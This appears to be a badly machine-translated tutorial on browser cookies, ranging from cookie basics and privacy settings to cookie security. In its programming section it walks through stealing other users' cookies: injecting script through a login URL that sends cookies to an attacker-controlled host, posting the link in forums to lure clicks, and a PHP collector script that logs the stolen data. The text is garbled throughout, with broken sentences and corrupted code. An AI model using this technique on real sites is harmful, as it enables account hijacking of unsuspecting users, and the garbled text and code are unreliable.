Login secret-cookie

Cookie inEnglishIt means a small dessert, and we can alwaysBrowserHow can food be related to browsers? When you browse a previously logged-on websiteWebpageIn: Hello XX, it feels very kind, just like eating a small dessert. This is actuallyFileTherefore, this file is called a cookie. Do you want to fully understand cookies? Let's take a look at the following!
1. Understand cookie ApplicabilityObject: Beginner
Cookie is a small text file stored on your machine when you browse a website. It records yourUserID, password, browsed web pageTimeWhen you come to the website again, the website reads cookies and learns about your information, so that you can make corresponding actions, as shown inPageDisplay your welcome slogans, or allow you to log on directly without entering your ID or password. You canTools/On the General tab of Internet Options, selectSet/View files "to view all cookies saved to your computer. These files are usually [Email = user @ domain] User @ domain [/Email]The format is named, and the user is your local User Name , Domain is the domain name of the accessed website. If you use the Netscape browser, it is stored in "C:/ProgramFiles/Netscape/users/". Unlike IE, Netscape uses a cookie file to record cookies of all websites.
To ensure Internet security, we need to set cookies appropriately. Open the "privacy" tab in "tools/Internet Options" (note that this setting only exists in ie6.0, its
In other versions, you can click "Custom Level" in the "Security" tab of "tools/Internet Options" to adjust the cookie security level. Normally, you can
Adjust the slider to the "medium" or "high" position. Majority Forum Site
You need to use cookie information. If you never go to these places, you can set the security level to "block all cookies ". If you only want to disable cookies for individual websites, you can click
Click "edit" to add the websites to be blocked to the list. In the "advanced" button options, you can set the first-party cookie to steal the token and drop the token ookie. The first-party cookie is
Third-party cookies are the cookies sent to you by websites that are not being browsed. You must select "reject" for third-party cookies ". If you want to save
Cookie. You can use IE's "Import and Export" Function , Open "file/import and export", and press Prompt Operation.
Most of the content in the cookie is encrypted, so it seems that it is only a combination of meaningless letters and numbers, only Server CGI Processing Program To understand their true meaning. Through some Software Me
You can view more content and use cookies.
The cookie information that the pal software can view. It provides the server, expires, name, value, and other options for us. The server is a storage
The cookie website expires records the Cookie's time and life cycle. The name and value fields are specific. Data .

Ii. Cookie Transmission Process Target Audience: Intermediate readers
When Web The URL of the site, the browser will send a request to the site to read the web page, and Result Display on the monitor. At this time, the webpage looks for the cookie file set for the Amazon website on your computer. if it finds the cookie file, the browser will send the data in the cookie file along with the previously entered URL to the Amazon server. When the server receives the cookie data Database Medium
Search for your ID, shopping records, personal preferences, and other information, and record new content, and add it to the database and cookie files. If no cookie is detected or your cookie is
If the information does not match the information in the database, it indicates that you are browsing the website for the first time. The CGI program on the server will create a new ID for you and save it to the database.
Cookies use web pages Code Medium
When the HTTP header information is transmitted, each web page request of the browser can be transmitted along with the cookie, for example, the open or refresh web page operation of the browser. The server adds the cookie to the webpage.
When the webpage data is returned to your browser, the browser will choose whether to save the data based on the cookie settings in your computer. If the browser does not allow cookie saving,
When the browser is closed, the data disappears. The cookie storage time on the computer is different. These are determined by the different settings of the server. Cookie has an expires (
Validity Period) attribute, which determines the cookie retention time. The server can change the cookie retention time by setting the value of the expires field. If this attribute is not set
Cookies are only valid during Webpage Browsing. Close the browser. Automatic The vast majority of websites are in this situation. Generally, cookies contain the following fields: Server, expires, name, and value. For the server, only the name and value fields are used. expires and other fields are used to tell the browser How Process these cookies.
3. Cookie programming target: Senior readers
Most Web pages Programming Language All provide support for cookies. Such as JavaScript, VBScript, Delphi, ASP, SQL, PHP, and C. In these
In the object-oriented programming language, the use of cookie programming is basically similar. The general process is: first create a cookie object, and then use the control Function Values, reads, and writes cookies. Then, how can we use code to obtain sensitive information in cookies of other users? The following is a brief introduction.
This method involves two steps: first, you need to locate the website where you need to collect cookies, analyze them, and construct a URL. Then, you need to compile the PHP code for collecting cookies, and put it on a website that you can control. When the visitor clicks the URL you constructed, the PHP code can be executed. The following describes the implementation process.
1. Analyze and construct a URL
First, open the website where we want to collect cookies. Http://www.XXX.net Log on to the website and enter the user name "" (without quotation marks) to capture data and obtain the data in the form of" Http://www.XXX.net/txl/login/log ...; OK. x = 28 & OK. Y = 6 "code, replace" "with" "and try again. If the execution is successful, start to construct the URL:" Http://www.XXX.net/txl/login/login.pl? Username = & Passwd = & OK. x = 28 & OK. Y = 6 ". Where Http: // www.cbifamily.org/cbi.php IsScript. Note that "% 2B" is the URL encoding of the symbol "+", because "+" is processed as a space. This URL can be published in the Forum to entice others to click.
2. Compile a PHP script
This script is used to collect cookie files. The specific content is as follows:
$ Info = getenv ("QUERY_STRING ");
If ($ info ){
$ Fp = fopen ("info.txt", "");
Fwrite ($ FP, $ info. "/N ");
Fclose ($ FP );
}
Header ("location: Http://www.XXX.net ");
?>

Iv. Cookie security problems applicable to: all readers who want to access the Internet safely
1. Cookie Spoofing
Cookies record the user's account ID, password, and other information. If it is transmitted online, it is usually encrypted using the MD5 method. In this way, even if the encrypted information is Network Upper
Some people with ulterior motives cannot understand it, because they only see meaningless letters and numbers. However, the problem is that the person who intercepts the cookie does not need to know the meaning of these strings,
As long as they submit others' cookies to the server and pass verification, they can impersonate victims and log on to the website. This method is called Cookie spoofing. Cookie Spoofing
The precondition is that the server verification program has a vulnerability and the impersonator must obtain the cookie information of the impersonator. At present, it is very difficult for the website's verification program to exclude all illegal logins, for example,
The language used to write the verification program may have a vulnerability. In addition, it is easy to obtain others' cookies. You can write a small piece of code in a language that supports cookies (For details, refer to 3), as long
Put this code in the network so that all cookies can be collected. If a Forum allows HTML code or allows the use of Flash tags, you can use these Technology Accept
Put the cookie-collecting code in the Forum, give the post an attractive topic, write interesting content, and soon a large number of cookies can be collected. On the Forum, many people get their passwords
Method. As for how to prevent it, there is no specific medicine yet. We can only use the usual protection methods. Do not use important passwords in forums, or use the IE function to automatically save passwords.
You do not need to log on to a website that does not know the details.
2. flash code hazards
Flash has a geturl () function. Flash can use this function to automatically open a specified webpage. Therefore, it may direct you to a website containing malicious code. For example, when
When you enjoy the exquisite Flash animation on your computer, the code in the animation frame may have been quietly connected to the Internet and opened a very small page containing special code. This page collects your
Cookie, you can also do other things, such as planting trojans on your machine or even formatting your hard disk. For flash, the Website Cannot be banned, because this is
The internal behavior of the flash file. What we can do is try to open the firewall if you are browsing locally. If the firewall prompts that packets sent to the outside are not known to you, it is best to disable it. If
If you want to enjoy it on the internet, you 'd better find some well-known big websites.